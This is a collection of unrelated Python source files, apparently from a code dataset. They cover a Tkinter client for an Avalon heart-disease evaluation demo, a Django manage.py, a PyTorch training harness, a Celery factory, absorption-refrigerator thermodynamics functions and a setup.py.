indent=4
)
def request(self):
jsonWindow(self, self.request_json, "Request JSON")
def result(self):
jsonWindow(self, self.result_json, "Result JSON")
def receipt(self):
jsonWindow(self, self.receipt_json, "Receipt JSON")
def close(self):
self.parent.focus_set()
self.destroy()
class jsonWindow(tk.Toplevel):
"""Template for JSON display
(from clicking View Request/Result/Receipt buttons).
"""
def __init__(self, parent, json, title):
tk.Toplevel.__init__(self, parent)
self.title(title)
self.scrollbar = tk.Scrollbar(self)
self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
self.text = tk.Text(self, yscrollcommand=self.scrollbar.set)
self.text.insert(tk.END, json)
self.text.config(state=tk.DISABLED)
self.text.pack(expand=True, fill="both")
self.scrollbar.config(command=self.text.yview)
def gui_main():
"""Create main Tkinter window and "Evaluate" event handler."""
root = tk.Tk()
root.title("Heart Disease Evaluation")
root.config(background=BACKGROUND)
# Display image
imageFile = TCFHOME + \
"/examples/apps/heart_disease_eval/images/ecg.jpg"
img = ImageTk.PhotoImage(Image.open(imageFile))
canvas = tk.Canvas(root, width=290, height=220, background=BACKGROUND)
canvas.pack()
canvas.create_image(20, 20, anchor=tk.NW, image=img)
# Setup left and right frames for data entry
var_root = tk.Frame(root, background=BACKGROUND)
var_root.pack(pady=(10, 0))
v_frame1 = tk.Frame(var_root, background=BACKGROUND)
v_frame1.pack(fill=tk.Y, side=tk.LEFT, padx=(10, 0))
v_frame2 = tk.Frame(var_root, background=BACKGROUND)
v_frame2.pack(fill=tk.Y, side=tk.LEFT, padx=(0, 10))
# Organizes parameter grid
global cur_row
cur_row = 0
# Parameter grid
age = intEntry(v_frame1, "Age")
sex = radio(v_frame1, "Sex", [("Male", 1), ("Female", 0)])
cp = radio(v_frame1, "Chest pain type", [("Typical angina", 1),
("Atypical angina", 2), ("Non-anginal pain", 3),
("Asymptomatic", 4)])
trestbps = intEntry(v_frame1, "Resting blood pressure\n (mm Hg)")
chol = intEntry(v_frame1, "Serum cholesterol (mg/dl)")
fbs = intEntry(v_frame1, "Fasting blood sugar (mg/dl)")
restecg = radio(v_frame1, "Electrocardiographic\n resting results",
[("Normal", 0), ("ST-T wave abnormality", 1),
("Showing hypertrophy", 2)])
thalach = intEntry(v_frame1, "Maximum heart rate")
exang = radio(v_frame2, "Exercise induced angina",
[("Yes", 1), ("No", 0)])
oldpeak = floatEntry(
v_frame2, "ST depression induced by\n exercise relative to rest")
slope = radio(v_frame2, "Slope of the peak\n exercise ST segment",
[("Upsloping", 0), ("Flat", 1), ("Downsloping", 2)])
ca = radio(v_frame2, "Major vessels colored\n by flouroscopy",
[("0", 0), ("1", 1), ("2", 2), ("3", 3)])
thal = radio(
v_frame2,
"Thallium stress test",
[("Normal", 3), ("Fixed defect", 6), ("Reversible defect", 7)])
num = radio(v_frame2, "Heart disease diagnosis",
[("<50% diameter narrowing", 0),
(">50% diameter narrowing", 1)])
var_list = [age, sex, cp, trestbps, chol, fbs, restecg, thalach,
exang, oldpeak, slope, ca, thal, num]
def string_toggle():
"""Disable/enable other variable entries/buttons based on
whether string input option is selected.
"""
if string_use.get() == 1 or random_use.get() == 1:
for var in var_list:
var.disable()
string_entry.config(state=tk.NORMAL)
else:
for var in var_list:
var.enable()
string_entry.config(state=tk.DISABLED)
# Input vars as string option with a check button to enable
random_frame = tk.Frame(root, background=ENTRY_COLOR)
random_frame.pack()
# Option to generate random data entry
random_use = tk.IntVar()
random_check = tk.Checkbutton(
random_frame, command=string_toggle, variable=random_use,
background=BACKGROUND)
random_check.pack(side=tk.LEFT)
random_label = tk.Label(
random_frame,
text="Generate random data ",
background=BACKGROUND)
random_label.pack(side=tk.LEFT)
# Option to enter data as space-separated string entries
string_frame = tk.Frame(root, background=ENTRY_COLOR)
string_frame.pack()
string_use = tk.IntVar()
string_check = tk.Checkbutton(
string_frame, command=string_toggle, variable=string_use,
background=BACKGROUND)
string_check.pack(side=tk.LEFT)
string_label = tk.Label(
string_frame,
text="Input variables as a string",
background=BACKGROUND)
string_label.pack(side=tk.LEFT)
string_entry = tk.Entry(
string_frame, state=tk.DISABLED, width=50,
background=ENTRY_COLOR)
string_entry.pack(side=tk.LEFT)
def evaluate():
"""Open window that will submit work order and retrieve
an evaluation result.
"""
message = "Heart disease evaluation data: "
if string_use.get() == 1: # input is space-separated numbers
input_data = string_entry.get()
if input_data is None or len(input_data) == 0:
messagebox.showwarning(
"Error", "Must input space-separated variables")
return
message = message + input_data
elif random_use.get() == 1:
input_data = _generate_random_data()
if input_data is None or len(input_data) == 0:
messagebox.showwarning(
"Error", "Random variable generation error")
return
message = message + input_data
else:
for var in var_list:
if var.get() is None:
messagebox.showwarning("Error", "Must input all variables")
return
message = message + str(var.get()) + " "
root.wait_window(resultWindow(root, message))
def aggregate():
"""Open window that will submit work order to retrieve
an aggregate result.
"""
message = "Heart disease aggregate data: "
root.wait_window(resultWindow(root, message))
# "Evaluate" button
eval_text = tk.StringVar()
eval_label = tk.Label(root, textvariable=eval_text,
background=BACKGROUND)
eval_label.pack()
eval_button = tk.Button(root, text="Evaluate", command=evaluate,
background=BUTTON_COLOR)
eval_button.pack()
# "Aggregate" button
aggr_text = tk.StringVar()
aggr_label = tk.Label(root, textvariable=aggr_text, background=BACKGROUND)
aggr_label.pack()
aggr_button = tk.Button(root, text="Aggregate all data",
command=aggregate, background=BUTTON_COLOR)
aggr_button.pack(pady=(0, 10))
root.mainloop()
def parse_command_line(args):
"""Setup and parse command line arguments and help information."""
global worker_obj
global worker_id
global verbose
global config
global off_chain
global requester_signature
parser = argparse.ArgumentParser()
use_service = parser.add_mutually_exclusive_group()
parser.add_argument(
"-c", "--config",
help="the config file containing the" +
" Ethereum contract information", type=str)
use_service.add_argument(
"-r", "--registry-list",
help="the Ethereum address of the registry list",
type=str)
use_service.add_argument(
"-s", "--service-uri",
help="skip URI lookup and send to specified URI",
type=str)
use_service.add_argument(
"-o", "--off-chain",
help="skip URI lookup and use the registry in the config file",
action="store_true")
parser.add_argument(
"-w", "--worker-id",
help="skip worker lookup and retrieve specified worker",
type=str)
parser.add_argument(
"-v", "--verbose",
help="increase output verbosity",
action="store_true")
parser.add_argument(
"-rs", "--requester_signature",
help="Enable requester signature for work order requests",
action="store_true")
options = parser.parse_args(args)
if options.config:
conf_files = [options.config]
else:
conf_files = [TCFHOME +
"/sdk/avalon_sdk/tcf_connector.toml"]
conf_paths = ["."]
try:
config = pconfig.parse_configuration_files(conf_files, conf_paths)
json.dumps(config, indent=4)
except pconfig.ConfigurationException as e:
logger.error(str(e))
sys.exit(-1)
global direct_jrpc
direct_jrpc = AvalonDirectClient(conf_files[0])
# Whether or not to connect to the registry list on the blockchain
off_chain = False
if options.registry_list:
config["ethereum"]["direct_registry_contract_address"] = \
options.registry_list
if options.service_uri:
service_uri = options.service_uri
off_chain = True
if options.off_chain:
service_uri = config["tcf"].get("json_rpc_uri")
off_chain = True
requester_signature = options.requester_signature
verbose = options.verbose
worker_id = options.worker_id
# Initializing Worker Object
worker_obj = worker.SGXWorkerDetails()
def initialize_logging(config):
"""Initialize logging."""
if verbose:
config["Logging"] = {
"LogFile": "__screen__",
"LogLevel": "INFO"
}
else:
config["Logging"] = {
"LogFile": "__screen__",
"LogLevel": "WARN"
}
plogger.setup_loggers(config.get("Logging", {}))
sys.stdout = plogger.stream_to_logger(
logging.getLogger("STDOUT"), logging.DEBUG)
sys.stderr = plogger.stream_to_logger(
logging.getLogger("STDERR"), logging.WARN)
def initialize_tcf(config):
"""Initialize Avalon: get Avalon worker instance."""
logger.info("***************** Avalon *****************")
# Retrieve Worker Registry
if not off_chain:
registry_list_instance = direct_jrpc. \
get_worker_registry_list_instance()
registry_count, lookup_tag, registry_list = \
registry_list_instance.registry_lookup()
logger.info("\n Registry lookup response : registry count {}\
lookup tag {} registry list {}\n".format(
registry_count, lookup_tag, registry_list
))
if (registry_count == 0):
logger.warn("No registries found")
sys.exit(1)
registry_retrieve_result = \
registry_list_instance.registry_retrieve(
registry_list[0])
logger.info("\n Registry retrieve response : {}\n".format(
registry_retrieve_result
))
config["tcf"]["json_rpc_uri"] = registry_retrieve_result[0]
# Prepare worker
global worker_id
if not worker_id:
worker_registry_instance = direct_jrpc.get_worker_registry_instance()
req_id = 31
worker_lookup_result = worker_registry_instance.worker_lookup(
worker_type=WorkerType.TEE_SGX,
id=req_id
)
logger.info("\n Worker lookup response : {} \n".format(
json.dumps(worker_lookup_result, indent=4)
))
if "result" in worker_lookup_result and \
"ids" in worker_lookup_result["result"].keys():
if worker_lookup_result["result"]["totalCount"] != 0:
worker_id = \
worker_lookup_result["result"]["ids"][0]
else:
logger.error("ERROR: No workers found")
sys.exit(1)
else:
logger.error("ERROR: Failed to lookup worker")
sys.exit(1)
req_id += 1
worker = worker_registry_instance.worker_retrieve(
worker_id,
req_id
)
logger.info("\n Worker retrieve response : {}\n".format(
json.dumps(worker, indent=4)
))
worker_obj.load_worker(
worker
)
logger.info("**********Worker details Updated with Worker ID" +
"*********\n%s\n", worker_id)
def main(args=None):
"""Entry point function."""
parse_command_line(args)
initialize_logging(config)
initialize_tcf(config)
# Open GUI
gui_main()
# -----------------------------------------------------------------------------
main()
|
py | 1a307088777aa0e35f95b844b6e96a4fe7c6fc1e | #!/usr/bin/env python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "myoauth.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
py | 1a30713242f679d0cf9a3f0fa4790f66a85e40ac | import numpy as np
import collections
import numbers
import torch
import os
from . import joint_network
from .summary import LamanClassificationSummary
from .. import corruption_dataset, model as mo
from .representation import graph_to_rep, combine_graph_reps, encode_action, LamanRep, get_action_offsets
from ..molecule_models import _train_utils, _train_harness
from ._utils import cast_numpy_rec
def _transform(graph, act):
graph_rep = graph_to_rep(graph)
act_encoded = encode_action(act, graph)
act_coarse = act.action_type
offset = torch.from_numpy(get_action_offsets(graph)).int()
return {
'graph': graph_rep,
'label': act_encoded,
'label_coarse': act_coarse,
'label_offset': offset
}
def _collate(batch):
graph = combine_graph_reps([b['graph'] for b in batch])
graph = cast_numpy_rec(graph)
label_fine = torch.LongTensor([b['label'] for b in batch])
label_coarse = torch.LongTensor([b['label_coarse'] for b in batch])
offsets = torch.stack([b['label_offset'] for b in batch])
return {'graph': graph, 'label': label_fine, 'label_coarse': label_coarse, 'label_offset': offsets}
def make_dataloader(dataset, batch_size=128, num_workers=2):
return torch.utils.data.DataLoader(
dataset, batch_size, shuffle=True, collate_fn=_collate,
pin_memory=True, num_workers=num_workers)
class LamanJointHarness(_train_harness.TrainingHarness):
_keys = ['label', 'label_offset']
def __init__(self, model, optimizer, summary, task='train', profile=False):
super(LamanJointHarness, self).__init__(model, optimizer, summary, task=task, profile=profile)
def get_model_input(self, batch):
graph = LamanRep.from_sequence(batch['graph'])
return graph,
def get_loss(self, model_output, batch):
loss, summary_info = mo.classification.multi_classification_coarse_to_fine_loss(
model_output, batch['label_coarse'], batch['label'], summary_info=True)
self.summary.record_marginal_probability(
torch.nn.functional.softmax(summary_info['coarse_logit'].detach(), dim=1).mean(dim=0))
return loss
def record_step_summary(self, batch, model_output):
logits_and_scopes = model_output
prediction, label, label_offset = _train_harness.compute_and_aggregate_predictions(
logits_and_scopes, batch, self._keys)
if self.summary:
self.summary.record_statistics(prediction, label, label_offset)
def main(parameters=None):
if parameters is None:
parameters = {}
task = parameters.get('task', 'train')
batch_size = parameters.get('batch_size', 256)
dataset_path = parameters.get('dataset_path')
if dataset_path is None:
dataset_path = '../data/laman/low_decomp_dataset_sample.pkl'
dataset = corruption_dataset.LamanCorruptionDataset(dataset_path, transform=_transform)
dataloader = make_dataloader(dataset, batch_size, num_workers=parameters.get('num_workers', 2))
config = joint_network.JointClassificationNetworkConfig(
5, message_size=256)
model = joint_network.JointClassificationNetwork(config)
if 'model_path' in parameters and parameters['model_path'] is not None:
model.load_state_dict(torch.load(parameters['model_path'], map_location='cpu'))
model = model.cuda()
if task != 'train':
model = model.eval()
if task == 'train':
optimizer, schedulers = _train_utils.init_optimizer(model, parameters)
else:
optimizer = None
schedulers = []
summary = LamanClassificationSummary()
harness = LamanJointHarness(model, optimizer, summary, task)
harness.hooks.extend([
_train_harness.LogLossTimeHook(batch_size),
_train_harness.PrintAccuracyHook(summary, None)
])
savedir = _train_utils.get_save_dir(parameters)
for epoch in range(30):
dataset.set_epoch(epoch)
harness.set_epoch(epoch)
if task == 'train':
for scheduler in schedulers:
scheduler.step()
harness.train_epoch(dataloader)
if task == 'train':
torch.save(
model.state_dict(),
os.path.join(savedir, 'laman_joint_ep_{0}.pth'.format(epoch)))
if __name__ == '__main__':
args = _train_utils.parse_arguments()
main(vars(args))
|
py | 1a30713db64a02d79f6d119907494d1b00e0c519 | from celery import Celery
def make_celery(app):
celery = Celery(
app.import_name,
broker=app.config.get('CELERY_BROKER_URL', 'redis://localhost:6379')
)
celery.conf.update(app.config)
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
return celery
|
py | 1a3071793dfa4b9b377970acbccf3fd7b1f75ffd | import numpy as np
import matplotlib.pyplot as plt
from sympy import solve, Eq, symbols
import sys
import pandas
import math
import os
def degradeCOP(Tevap, Tcond, Qall, S):
degraded = ((Tevap * Tcond)/(Tcond - Tevap)) * (S/Qall)
return degraded
# This function calculates the reversible COP of a ES refrigerator based on thermal reservoirs
def reversibleCOP(Tevap, Tcond, Tgen):
revCOP = (((Tgen - Tcond)/(Tgen))/((Tcond-Tevap)/Tevap))
return revCOP
# This function solves the system of equations to calculate the mass flowrates of
# the combined absorber-evaporator system
def massabsorberevaporator(m6, m4, xa4, ya3, xa6):
m3, m5= symbols(['m3', 'm5'])
system = [
#Eq((xa4*m4)+ (ya3 * m3) - (0 * m5) - (xa6 * m6), 0),
Eq(m5 - (1-ya3)*m3,0),
Eq(m4 + m3 - m5 - m6, 0),
#Eq((1-ya3)*m3-m5, 0)
#Eq(m4 - (ya3*m3) - (m5) + (ya3 * m6), 0)
]
soln = solve(system, [m4, m3, m5, m6])
return float(m4), float(soln[m3]), float(soln[m5]), float(m6)
# This is an interpolate helper function to be used in other functions.
# targetcomp refers to ammonia composition. All CSV files are in ammonia composition.
def interpolateAW(targetcomp, T, var):
# must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
rel_path = 'data/mixed/'
abs_file_path = os.path.join(script_dir, rel_path)
colnames = ['pressure', 'ammoniacomp', 'prop']
propertyname = ''
if var is 1:
propertyname = 'enthalpy'
else:
propertyname = 'entropy'
filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniawater'
data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames)
ammoniacomp = data.ammoniacomp.tolist()
prop = data.prop.tolist()
lower = prop[int(math.floor(targetcomp /0.05))]
higher = prop[(int((math.floor(targetcomp /0.05))+1))]
theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 )
return (theta * higher) + (1-theta)*lower
def interpolateAB(targetcomp, T, var):
# must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
rel_path = 'data/mixed/'
abs_file_path = os.path.join(script_dir, rel_path)
colnames = ['pressure', 'ammoniacomp', 'prop']
propertyname = ''
if var is 1:
propertyname = 'enthalpy'
else:
propertyname = 'entropy'
filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniabutane'
data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames)
ammoniacomp = data.ammoniacomp.tolist()
prop = data.prop.tolist()
lower = prop[int(math.floor(targetcomp /0.05))]
higher = prop[(int((math.floor(targetcomp /0.05))+1))]
theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 )
return (theta * higher) + (1-theta)*lower
# This calculates the two mass flowrates and the compositions coming out of the flash drum
# given a mass flowrate and composition of ammonia coming in
# inputcomp is the ammonia composition
# temp is the temperature that the flash drum flashes at
def leverrule(inputflow, temp, inputcomp):
#t-xy of ammonia-water
#input composition of ammonia
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
rel_path = "data/txy/"
abs_file_path = os.path.join(script_dir, rel_path)
colnames = ['pressure', 'ammoniacomp', 'temperature', 'vaporwater', 'vaporammonia', 'liquidwater', 'liquidammonia']
filename = 'txy-ammonia-4bar'
data = pandas.read_csv( str(abs_file_path) + '%s.csv' %filename, names = colnames)
ammoniacomp = data.ammoniacomp.tolist()
temperature = data.temperature.tolist()
vaporammonia = data.vaporammonia.tolist()
liquidammonia = data.liquidammonia.tolist()
index, valuetemp = min(enumerate(temperature), key=lambda x: abs(x[1]-temp))
liquiddistance = inputcomp - liquidammonia[index]
vapordistance = vaporammonia[index] - inputcomp
vaporflow = symbols('vaporflow')
system = [
Eq((vapordistance * vaporflow) + (-1.0*liquiddistance*(float(inputflow) - vaporflow)), 0)
]
soln = solve(system, [vaporflow])
# the order is: vapor flow, liquid flow, liquid ammonia composition. vapor ammonia composition
return soln[vaporflow], (inputflow - soln[vaporflow]) ,liquidammonia[index], vaporammonia[index]
# This calculates the Q of the generator
# compin is the ammonia composition
def Qgenerator(massin, compin, Tgen):
massout = massin
enthalpyin = interpolateAW(compin, 325, 1 )
enthalpyout = interpolateAW(compin, Tgen, 1)
Qgen = -1*(massin*enthalpyin - massout*enthalpyout)
return Qgen
# This calculates the S of the flash
# compin is the ammonia flash
def Sgenerator(massin, compin, Qgen, Tgen):
massout = massin
entropyin = interpolateAW(compin, 325, 2)
#RAHUL fixed Line 95 - wrong entropy values read in
entropyout = interpolateAW(compin, Tgen, 2)
Sgen = symbols('Sgen')
system = Eq((-1 * massin * entropyin ) + (massout*entropyout) + (Qgen/Tgen) - Sgen, 0)
soln = solve([system], Sgen)
return soln[Sgen]
def Qflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Tgen):
enthalpyin = interpolateAW( compin, Tgen, 1)
enthalpyoutvapor = interpolateAW(vaporammonia, Tgen, 1)
enthalpyoutliquid = interpolateAW( liquidammonia, Tgen, 1)
Qflash = symbols('Qflash')
system = Eq(( massin* enthalpyin ) + (-1* massvapor*enthalpyoutvapor) + (-1* massliquid*enthalpyoutliquid) + Qflash, 0)
soln = solve([system], [Qflash])
return soln[Qflash]
# This calculates the S of the flash
# compin is the ammonia flash
def Sflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Qflash, Tgen):
entropyin = interpolateAW( compin, Tgen, 2)
entropyoutvapor = interpolateAW(vaporammonia, Tgen, 2)
entropyoutliquid = interpolateAW(liquidammonia, Tgen, 2)
Sflash = symbols('Sflash')
system = Eq(( massin* entropyin ) + (-1* massvapor*entropyoutvapor) + (-1* massliquid*entropyoutliquid) + (Sflash/Tgen) - Qflash, 0)
soln = solve([system], Sflash)
return soln[Sflash]
def Qevaporator(m2, m3, m5, ya3, ya2, xa5, Tgen):
enthalpym2 = interpolateAW(ya2, Tgen, 1)
enthalpym3 = interpolateAB( ya3, 266, 1)
#print(enthalpym3)
enthalpym5 = interpolateAB( xa5, 325, 1)
#print(enthalpym5)
# print(enthalpym2 + enthalpym3 + enthalpym5)
Qevap = symbols('Qevap')
system = Eq(( m2 * enthalpym2 ) + (-1* m3*enthalpym3) + (m5*enthalpym5) + Qevap, 0)
soln = solve([system], Qevap)
#print(type(soln))
return soln[Qevap]
def Sevaporator(m2, m3, m5, ya3, ya2, xa5, Qevap, Tgen):
entropym2 = interpolateAW(ya2, Tgen, 2)
entropym3 = interpolateAB( ya3, 266, 2)
entropym5 = interpolateAB( xa5, 325, 2)
Sevap = symbols('Sevap')
system = Eq(( m2 * entropym2 ) + (-1* m3*entropym3) + (m5*entropym5) + (Qevap/266) - Sevap, 0)
soln = solve([system], Sevap)
return soln[Sevap]
def Qabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Tgen):
enthalpym3 = interpolateAB( ya3, 266, 1)
enthalpym4 = interpolateAW( xa4, Tgen, 1)
enthalpym5 = interpolateAB(xa5, 325, 1)
enthalpym6 = interpolateAW( xa6, 325, 1)
Qabs = symbols('Qabs')
system = (m3 * enthalpym3 ) + (m4 * enthalpym4) + (-1*m5 * enthalpym5) + (-1 * m6 * enthalpym6) + Qabs
soln = solve([system], Qabs)
return soln[Qabs]
def Sabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Qabs, Tgen):
entropym3 = interpolateAB( ya3, 266, 2)
entropym4 = interpolateAW( xa4, Tgen, 2)
entropym5 = interpolateAB( xa5, 325, 2)
entropym6 = interpolateAW(xa6, 325, 2)
Sabs = symbols('Sabs')
system = Eq((m3*entropym3) + (m4 * entropym4) + (-1*m5 * entropym5) + (-1*m6*entropym6) + (Qabs/325)- Sabs, 0)
soln = solve([system], Sabs)
return soln[Sabs] |
py | 1a307224ae5f0e70ae470da0a1bec456b3c60633 | from setuptools import setup, find_packages
import versioneer
setup(
name="pylammpsmpi",
version=versioneer.get_version(),
description="Parallel Lammps Python interface",
url='https://github.com/pyiron/pylammpsmpi',
author='Jan Janssen',
author_email='[email protected]',
license='BSD',
classifiers=['Development Status :: 5 - Production/Stable',
'Topic :: Scientific/Engineering :: Physics',
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9'
],
keywords='lammps, mpi4py',
packages=find_packages(exclude=["*tests*"]),
install_requires=[
'mpi4py==3.1.3'
],
cmdclass=versioneer.get_cmdclass(),
)
|